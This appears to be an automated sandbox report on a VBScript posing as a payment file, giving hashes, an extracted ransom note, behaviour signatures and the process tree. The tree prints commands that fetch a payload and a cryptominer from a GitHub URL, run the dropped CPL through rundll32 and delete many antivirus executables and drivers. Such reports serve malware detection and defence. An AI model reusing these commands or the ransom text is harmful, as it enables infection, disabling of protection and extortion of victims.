Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 18:42

General

  • Target

    Payment_Activity_0037_2025-3-30.vbs

  • Size

    13KB

  • MD5

    1666b10f8f85c81a689e60018dd65abf

  • SHA1

    40320e7700630bc0e35a11cc803cfa3ad46aa79b

  • SHA256

    eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

  • SHA512

    0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc

  • SSDEEP

    192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decrypt_files.txt

Ransom Note
ATTENTION! You can return your files! All your files are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and key. Do not try to recover your files without a decrypt tool or try to turn off your pc, this may damage your files making them making them impossible to recover. We advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: [email protected] [email protected] ID :1A4719C109C140BDB292B09BD4C817D1BFF09B110B8819ECE5CDDF4528BF1F18

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Activity_0037_2025-3-30.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4432
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.scribd.com/document/806838445/Bank-Statement
          4⤵
          • Drops file in Program Files directory
          • Checks processor information in registry
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4260
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x348,0x7ff80666f208,0x7ff80666f214,0x7ff80666f220
            5⤵
              PID:5156
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1868,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3
              5⤵
                PID:4540
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
                5⤵
                  PID:5252
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1964,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:8
                  5⤵
                    PID:4768
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
                    5⤵
                      PID:3800
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
                      5⤵
                        PID:5412
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5060,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:1
                        5⤵
                          PID:3324
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5140,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:1
                          5⤵
                            PID:2412
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5332,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:1
                            5⤵
                              PID:216
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3740,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:1
                              5⤵
                                PID:860
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5380,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5400 /prefetch:1
                                5⤵
                                  PID:5848
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5480,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1
                                  5⤵
                                    PID:5028
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5756,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:8
                                    5⤵
                                      PID:3052
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5820,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:8
                                      5⤵
                                        PID:5804
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8
                                        5⤵
                                          PID:2248
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6828,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:8
                                          5⤵
                                            PID:4844
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6828,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:8
                                            5⤵
                                              PID:2532
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6576,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6552 /prefetch:8
                                              5⤵
                                                PID:624
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6400,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6756 /prefetch:8
                                                5⤵
                                                  PID:4248
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5836 /prefetch:8
                                                  5⤵
                                                    PID:5372
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6904,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6688 /prefetch:8
                                                    5⤵
                                                      PID:116
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6908,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=6736 /prefetch:8
                                                      5⤵
                                                        PID:3148
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5832 /prefetch:8
                                                        5⤵
                                                          PID:7160
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5880,i,843078539573903681,12133458086455069183,262144 --variations-seed-version --mojo-platform-channel-handle=5988 /prefetch:8
                                                          5⤵
                                                            PID:5184
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                      2⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1068
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                        3⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Downloads MZ/PE file
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4496
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                      2⤵
                                                        PID:4144
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                          3⤵
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:5272
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                        2⤵
                                                          PID:1472
                                                          • C:\Windows\System32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                            3⤵
                                                              PID:3856
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                                4⤵
                                                                • Loads dropped DLL
                                                                • Adds Run key to start application
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5572
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                          1⤵
                                                            PID:760
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\rundll32.exe" shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                            1⤵
                                                              PID:3032
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                                2⤵
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5964
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                              1⤵
                                                                PID:4824
                                                                • C:\Windows\System32\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                                  2⤵
                                                                    PID:3312
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\ProgramData\DNSBackup\DNSBackup.cpl
                                                                      3⤵
                                                                      • Blocklisted process makes network request
                                                                      • Drops startup file
                                                                      • Loads dropped DLL
                                                                      • Drops desktop.ini file(s)
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4432
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Windows Defender\MpCmdRun.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2176
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Windows Defender\MsMpEng.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2136
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Windows Defender\NisSrv.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4456
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\WdBoot.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3276
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\WdFilter.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5080
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\WdNisDrv.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4728
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5256
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\srtsp.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3644
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\McAfee\MSC\mcshield.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3888
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Common Files\McAfee\mfemms.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4204
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Common Files\McAfee\masvc.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1232
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Common Files\McAfee\mcsvhost.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2520
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\McAfee\Endpoint Security\Firewall\mfefire.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1576
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\klif.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4596
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdservicehost.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4620
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdredline.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4464
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdparentalservice.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2504
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Bitdefender\Bitdefender Security Service\bdncscv.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4952
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\ESET\ESET Security\egui.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4036
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\ESET\ESET Security\ekrn.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4396
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\eamonm.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5048
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\ehdrv.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3332
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\AVAST Software\Avast\avastsvc.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4600
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\AVAST Software\Avast\avastui.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5340
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\AVAST Software\Avast\aswidsagent.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2176
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Windows\System32\drivers\aswSnx.sys"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:6112
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\AVG\Antivirus\avgemc.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2492
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Trend Micro\Titanium\coreServiceShell.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3132
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Trend Micro\Titanium\TmListen.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4144
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Trend Micro\Titanium\TMBMSRV.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4424
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:6004
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Sophos\Sophos Anti-Virus\SophosUI.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:440
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c del /F /Q "C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5280
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c powershell Invoke-WebRequest -Uri http://raw.githubusercontent.com/SC10001/Di/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1576
